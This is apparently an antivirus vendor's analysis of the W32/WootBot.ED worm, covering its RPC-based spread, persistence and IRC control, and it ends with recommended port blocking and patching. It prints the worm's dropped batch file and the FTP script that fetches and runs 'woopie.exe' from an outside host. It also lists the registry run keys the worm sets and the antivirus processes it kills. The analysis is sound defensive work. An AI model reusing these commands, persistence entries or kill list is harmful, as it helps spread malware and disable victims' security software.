W32/WootBot.ED!worm
Analysis
This virus is 32-bit with a packed file size of 86,466 bytes. It contains instructions to spread to other systems using known RPC exploits, and also connect with an IRC server to await instructions from a malicious user. The virus can terminate utility programs and other important services.
Service Termination Routine
When the virus activates, it will use PSAPI.DLL to identify
and terminate applications or services based on a master
list stored in the virus. The list also includes names
of other known threats -
Common threat filenames
video.exe
norton123.exe
svchosting.exe
0x1fe.exe
inst.EXEexplore32.exe
winagent.exe
lssas.exe
lsass2.exe
rxb1ot.exe
serasa.exe
serasa.exe.a
novarg_upx.zip
photo.zip
opr0371I.js
change.exe
pic33.scr
winset32.exe
wuarclt.exe
Crypto3.jpg
Tcpview1.exe
Tcpview.exe
taskmgr1.exe
taskmg.exe
cmd2.exe
cmd1.exe
ad-watch.exe
expore.exe
CSSSS.exe
CSRSR.exe
CSRSRS.exe
smsss.exe
sub7.exe
jpg.exebot.exe
fbi.exe
wupdate.exe
phatbot.exe
agobot.exe
iexplorer.exe
windowsupdate.exe
gov.exe
bircd.exe
rbot.exe
spybot.exe
rxbot.exe
forbot.exe
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
mscvb32.exe
sysinfo.exe
Utility applications or services
PandaAVEngine.exe
F-AGOBOT.EXE
HIJACKTHIS.EXE
wircd.exe
cmd.exe
regedit.exe
msconfig.exe
taskmgr.exe
zapro.EXE
vsmon.EXE
vshwin32.EXE
vbcmserv.EXE
sbserv.EXE
rtvscan.EXE
rapapp.EXE
pcscan.EXE
pccwin97.EXE
pccntmon.EXE
pavproxy.EXE
nvsvc32.EXE
ntrtscan.EXE
npscheck.EXE
notstart.EXE
lockdown2000.EXE
iamserv.EXE
iamapp.EXE
gbpoll.EXE
gbmenu.EXE
fsmb32.EXE
fsma32.EXE
fsm32.EXE
fsgk32.EXE
fsav32.EXE
fsaa.EXE
fnrb32.EXE
fih32.EXE
fch32.EXE
fameh32.EXE
f-stopw.EXE
defscangui.EXE
defalert.EXE
cpd.EXE
cleaner3.EXE
cleaner.EXE
ccPxySvc.EXE
ccEvtMgr.EXE
ccApp.EXE
blackd.EXE
avpm.EXE
avkwctl9.EXE
avkservice.EXE
avkpop.EXE
apvxdwin.EXE
agentw.EXE
ZONALM2601.EXE
CZAUINST.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WrCtrl.EXE
WrAdmin.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
Internet Connection Attempts
The virus then begins scanning random IP addresses using
TCP port 445 to identify potential targets. The virus
will send a SYN packet to randomly selected IP addresses
from the subnet the system is on. For instance, if the
infected system's IP address is 10.10.18.185, the virus
targets systems on 10.10.undefinedrandomundefined.undefinedrandomundefined such as these
examples -
10.10.1.240
10.10.25.13
10.10.69.53
10.10.17.119
and so on. If a system responds with an acknowledgement [ACK], it becomes a target for the virus. The virus will try to gain access by implementing an RPC DCOM exploit. If access is gained, the virus creates a batch script file named "c.bat" with these instructions -
@echo off
ftp -n -v -s:.pif
woopie.exe
del .pif
del /F c.bat
exit /y
The instructions above do the following -
- start an instance of the program FTP [file transfer
protocol]
- suppress displaying server responses, and prevent
auto login when connecting
- use a script file named ".pif" to handle
logon info
- run the file "woopie.exe"
- delete the ftp script file ".pif", and
forcibly delete the current batch script "c.bat"
- exit the command shell
The ftp script file ".pif" contains these instructions -
open dra.chatcenter.nl
21
user ******* ******
binary
GET woopie.exe
bye
In the above script, the user name and password info has been edited for obvious reasons. The file "woopie.exe" is a copy of the virus. Fortigate would block any transfer if scanning of the FTP service is enabled.
Loading at Windows startup
If virus is run, it will copy itself to the hard drive
into the System32 folder as "Nvsc32.exe" and
modify the registry in numerous places to maximize the
chance of the virus loading at each user logon instance
-
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
"NvCplScan" = nvsc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"NvCplScan" = nvsc32.exe
Additionally, the virus creates a service on Windows
NT/2000/XP systems and adjusts the registry with these
changes -
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\
"NextInstance" = 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\
"Class" = LegacyDriver
"ClassGUID" = {8ECC055D-047F-11D1-A537-0000F8753ED1}
"ConfigFlags" = 00, 00, 00, 00
"DeviceDesc" = NvCplScan
"Legacy" = 01, 00, 00, 00
"Service" = NvCplScan
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\Control\
"*NewlyCreated*" = 00, 00, 00, 00
"ActiveService" = NvCplScan
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\
"DeleteFlag" = 01, 00, 00, 00
"DisplayName" = NvCplScan
"ErrorControl" = 01, 00, 00, 00
"FailureActions" = (hex values)
"ImagePath" = "C:\WINNT\System32\nvsc32.exe"
-netsvcs
"ObjectName" = LocalSystem
"Start" = 04, 00, 00, 00
"Type" = 20, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Enum\
"0" = Root\LEGACY_NVCPLSCAN\0000
"Count" = 01, 00, 00, 00
"NextInstance" = 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Security\
"Security" = (hex values)
IRC Server Connection
The virus may bind to a TCP port and then attempts to
connect with the IRC server 'members.home.nl'. When
connected, the virus will await instructions from a
malicious user.
The commands could carry out instructions such as send floods (PING, HTTP, UDP, SYN), scan for exploits (DCOM, NetBIOS) and other instructions. The virus could also function as an FTP or HTTP server and act as a file server or staging server.
Miscellaneous
The virus contains the string 'Woot' in its body.
Recommended Action
- Block Internal to External (INT -> EXT) and External
to Internal (EXT -> INT) traffic on port TCP ports
135, 139, 445, and 6667
- Ensure the latest Microsoft Security patches are
applied to all systems with regard to patching RPC
vulnerabilities and other vulnerabilities associated
with this virus